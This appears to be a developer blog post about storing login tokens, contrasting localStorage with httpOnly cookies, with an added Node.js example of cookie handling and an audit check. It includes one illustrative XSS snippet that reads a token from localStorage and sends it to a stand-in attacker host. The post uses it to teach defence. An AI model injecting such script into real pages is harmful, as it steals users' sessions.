🔐 "Just get it working first!" is fine; the "security" you should think about afterwards
Posted: May 26, 2025
When you're developing a web app, one of the first things you want to add is a login feature.
At the start, what matters most is simply that it works. If it works, that's good enough.
- Log in and get taken to the dashboard
- Reopen the app and you're still logged in
- Tick "keep me logged in" and it's remembered
Getting this far is enough to make you think "Oh, it works!" and get excited.
But it shouldn't end there.
This post is about where to store the token: the thing you should come back to and think through properly from a security standpoint.
The simplest way to get things working, and the one you see used most often, is this:
```javascript
localStorage.setItem("accessToken", token);
```
After login you fetch the token, save it in localStorage, and on the next visit read it back with localStorage.getItem(); that gives you an implementation that "looks like" it keeps you logged in.
It's very easy, and it works.
localStorage and sessionStorage can be read and written easily by any JavaScript running in the page.
That means that if a **malicious script (an XSS attack)** gets injected, the following becomes possible:
```javascript
// An injected script reads the token out of localStorage and sends it to a third-party server.
const stolenToken = localStorage.getItem("accessToken");
fetch("https://attacker.com/steal", {
  method: "POST",
  body: JSON.stringify({ token: stolenToken }),
});
```
That is genuinely dangerous.
If instead you store the token in a cookie with the httpOnly flag, JavaScript cannot access it at all.
In other words, the damage an XSS attack can do is greatly reduced.
```javascript
res.cookies.set("access-token", token, {
  httpOnly: true, // not readable from JavaScript
  secure: true, // only sent over HTTPS
  sameSite: "lax",
  path: "/",
  maxAge: 60 * 60 * 24 * 30, // 30 days
});
```
With these settings, the browser sends the token to the server automatically and it is never touched on the client side.
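As an added example (not code from the original post, and not Next.js's own API), here is what the cookie-based flow looks like on the server side in plain Node.js: a helper that serializes a Set-Cookie header with the same attributes as the config above, a parser for the Cookie header the browser sends back on its own, a small protected-route handler, and an audit check that flags a token cookie missing HttpOnly, Secure or SameSite. The function names, the session store and the token values are all constructed for this example.

```javascript
// Added example, not part of the original post: framework-free Node.js
// handling of an httpOnly token cookie. Function names, the session store
// and all token values below are constructed for illustration.

// Serialize a Set-Cookie header. The options mirror the res.cookies.set()
// config in the post (httpOnly, secure, sameSite, path, maxAge).
function buildSetCookie(name, value, opts = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (opts.maxAge !== undefined) parts.push(`Max-Age=${opts.maxAge}`);
  if (opts.path) parts.push(`Path=${opts.path}`);
  if (opts.sameSite) {
    const s = opts.sameSite;
    parts.push(`SameSite=${s[0].toUpperCase()}${s.slice(1).toLowerCase()}`);
  }
  if (opts.secure) parts.push("Secure");
  if (opts.httpOnly) parts.push("HttpOnly");
  return parts.join("; ");
}

// Parse the Cookie request header the browser attaches by itself to every
// later same-site request; no client-side JavaScript is involved.
function parseCookieHeader(header) {
  const cookies = {};
  for (const pair of (header || "").split(";")) {
    const eq = pair.indexOf("=");
    if (eq < 0) continue;
    const key = pair.slice(0, eq).trim();
    if (key) cookies[key] = decodeURIComponent(pair.slice(eq + 1).trim());
  }
  return cookies;
}

// Audit check: list the attributes a token cookie should carry but lacks.
function auditSetCookie(setCookie) {
  const attrs = setCookie.split(";").slice(1).map((a) => a.trim().toLowerCase());
  const has = (n) => attrs.some((a) => a === n || a.startsWith(`${n}=`));
  const missing = [];
  if (!has("httponly")) missing.push("HttpOnly");
  if (!has("secure")) missing.push("Secure");
  if (!has("samesite")) missing.push("SameSite");
  return missing;
}

// Constructed server-side session store: opaque token -> user name.
const SESSIONS = new Map([["tok-constructed-123", "alice"]]);

// Login response: the token travels only in Set-Cookie, never in the JSON
// body, so there is nothing for page scripts to copy into localStorage.
function loginResponse(token) {
  const setCookie = buildSetCookie("access-token", token, {
    httpOnly: true,
    secure: true,
    sameSite: "lax",
    path: "/",
    maxAge: 60 * 60 * 24 * 30,
  });
  return { status: 200, headers: { "set-cookie": setCookie }, body: { ok: true } };
}

// Protected route: the token is read from the Cookie header and looked up
// server-side; a missing or unknown token gets 401.
function handleProtected(req) {
  const token = parseCookieHeader(req.headers.cookie)["access-token"];
  const user = token ? SESSIONS.get(token) : undefined;
  if (!user) return { status: 401, body: { error: "unauthorized" } };
  return { status: 200, body: { user } };
}

// Stand-alone demo with constructed requests (no network involved).
function demo() {
  const login = loginResponse("tok-constructed-123");
  const ok = handleProtected({ headers: { cookie: "theme=dark; access-token=tok-constructed-123" } });
  const anon = handleProtected({ headers: {} });
  return {
    setCookie: login.headers["set-cookie"],
    ok: ok.status,
    anon: anon.status,
    missing: auditSetCookie(login.headers["set-cookie"]),
  };
}

console.log(demo());
```

Run it with node to see the Set-Cookie line, the 200/401 results and an empty "missing" list. On the browser side the matching fetch needs no token handling at all, because the browser attaches the cookie itself (for a cross-origin API you would add credentials: "include"); the audit function is the check worth running against your own login response before shipping.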
The pitfall beginners tend to fall into is stopping at "it works, so it's fine!"
But once your web app starts getting some real use, you also need to protect it against malicious access.
That is exactly why I think the natural, and correct, order of development is this: first build a "working login feature" using something like localStorage, then read up on security and migrate to a cookie-based approach.
📝 Bonus: key points to remember
You don't need to understand security perfectly before you implement anything.
At first I was satisfied with "I can log in! The state persists!" But as I went on building my own original app, a very real sense of danger set in: **"What if I log in from someone else's browser?" "What if malicious code gets injected?"**
As my app gained users and features, I realized that "working correctly" alone wasn't enough.
Once I had something that worked, I could finally think seriously about "how do I protect it?" That was a realization I only reached by building my own app.